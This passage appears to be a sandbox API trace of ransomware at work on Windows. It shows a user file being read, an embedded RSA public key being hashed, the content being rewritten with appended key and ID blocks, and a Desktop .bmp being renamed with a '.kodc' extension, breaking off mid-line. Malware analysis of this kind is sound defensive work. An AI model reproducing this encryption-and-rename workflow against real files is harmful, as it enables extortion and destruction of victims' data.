[0100.792] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=48697) returned 1 [0100.792] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0100.794] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbe13, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.794] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0100.795] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.795] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xbe39, lpOverlapped=0x0) returned 1 [0100.796] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.796] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0100.796] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.796] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0100.796] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0100.797] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0100.797] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0100.797] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0100.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0100.797] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0100.797] GetLastError () returned 0x0 [0100.797] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0100.797] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0100.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.797] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0100.797] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0100.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.797] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0100.797] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0100.797] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe40) returned 0x9ba8d90 [0100.798] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0100.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5a58 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e18 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5aa0 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e30 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e60 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e78 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0100.798] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0100.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e60 | out: hHeap=0x630000) returned 1 [0100.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e78 | out: hHeap=0x630000) returned 1 [0100.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0100.798] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7e78 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7e60 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0100.798] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0100.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0100.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0100.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0100.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0100.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0100.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0100.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e78 | out: hHeap=0x630000) returned 1 [0100.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e60 | out: hHeap=0x630000) returned 1 [0100.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0100.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0100.799] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.799] GetCurrentThreadId () returned 0x42c [0100.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0100.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7618 [0100.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0100.799] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0100.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0100.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0100.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0100.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.800] GetCurrentThreadId () returned 0x42c [0100.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.800] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0100.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0100.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0100.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0100.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e60 [0100.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0100.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e78 [0100.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0100.801] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0100.801] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e48 [0100.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0100.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0100.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0100.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7e90 [0100.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7a28 [0100.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0100.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0100.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0100.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e60 | out: hHeap=0x630000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7e60 [0100.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0100.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0100.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0100.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c770 [0100.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0100.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e60 | out: hHeap=0x630000) returned 1 [0100.802] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x9b9c950 [0100.802] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0100.803] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e90 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e78 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e48 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7e30 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb5aa0 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318138 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0100.803] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0100.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0100.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0100.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0100.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0100.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0100.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0100.804] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba8d90*, nNumberOfBytesToWrite=0xbe34, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba8d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xbe34, lpOverlapped=0x0) returned 1 [0100.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba8d90 | out: hHeap=0x630000) returned 1 [0100.804] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbe39, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.804] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0100.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0100.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0100.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0100.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0100.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x694598 [0100.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0100.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce5b0 | out: hHeap=0x630000) returned 1 [0100.804] WriteFile (in: hFile=0x5cc, lpBuffer=0x694598*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x694598*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0100.805] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0100.805] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0100.805] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0100.805] CloseHandle (hObject=0x5cc) returned 1 [0100.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3336ce0 [0100.806] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8c0) returned 0x33515f0 [0100.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3336ce0 | out: hHeap=0x630000) returned 1 [0100.806] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\pC 1IafdNC2Xu47Zyxxd.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\pc 1iafdnc2xu47zyxxd.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\pC 1IafdNC2Xu47Zyxxd.bmp.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kmpcg-yoqu21bwvljwxx\\pc 1iafdnc2xu47zyxxd.bmp.kodc")) returned 1 [0100.807] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0100.807] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0100.807] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.808] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f3058 | out: hHeap=0x630000) returned 1 [0100.808] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e576380, ftCreationTime.dwHighDateTime=0x1d5bba0, ftLastAccessTime.dwLowDateTime=0x8ff70340, ftLastAccessTime.dwHighDateTime=0x1d5bafd, ftLastWriteTime.dwLowDateTime=0x8ff70340, 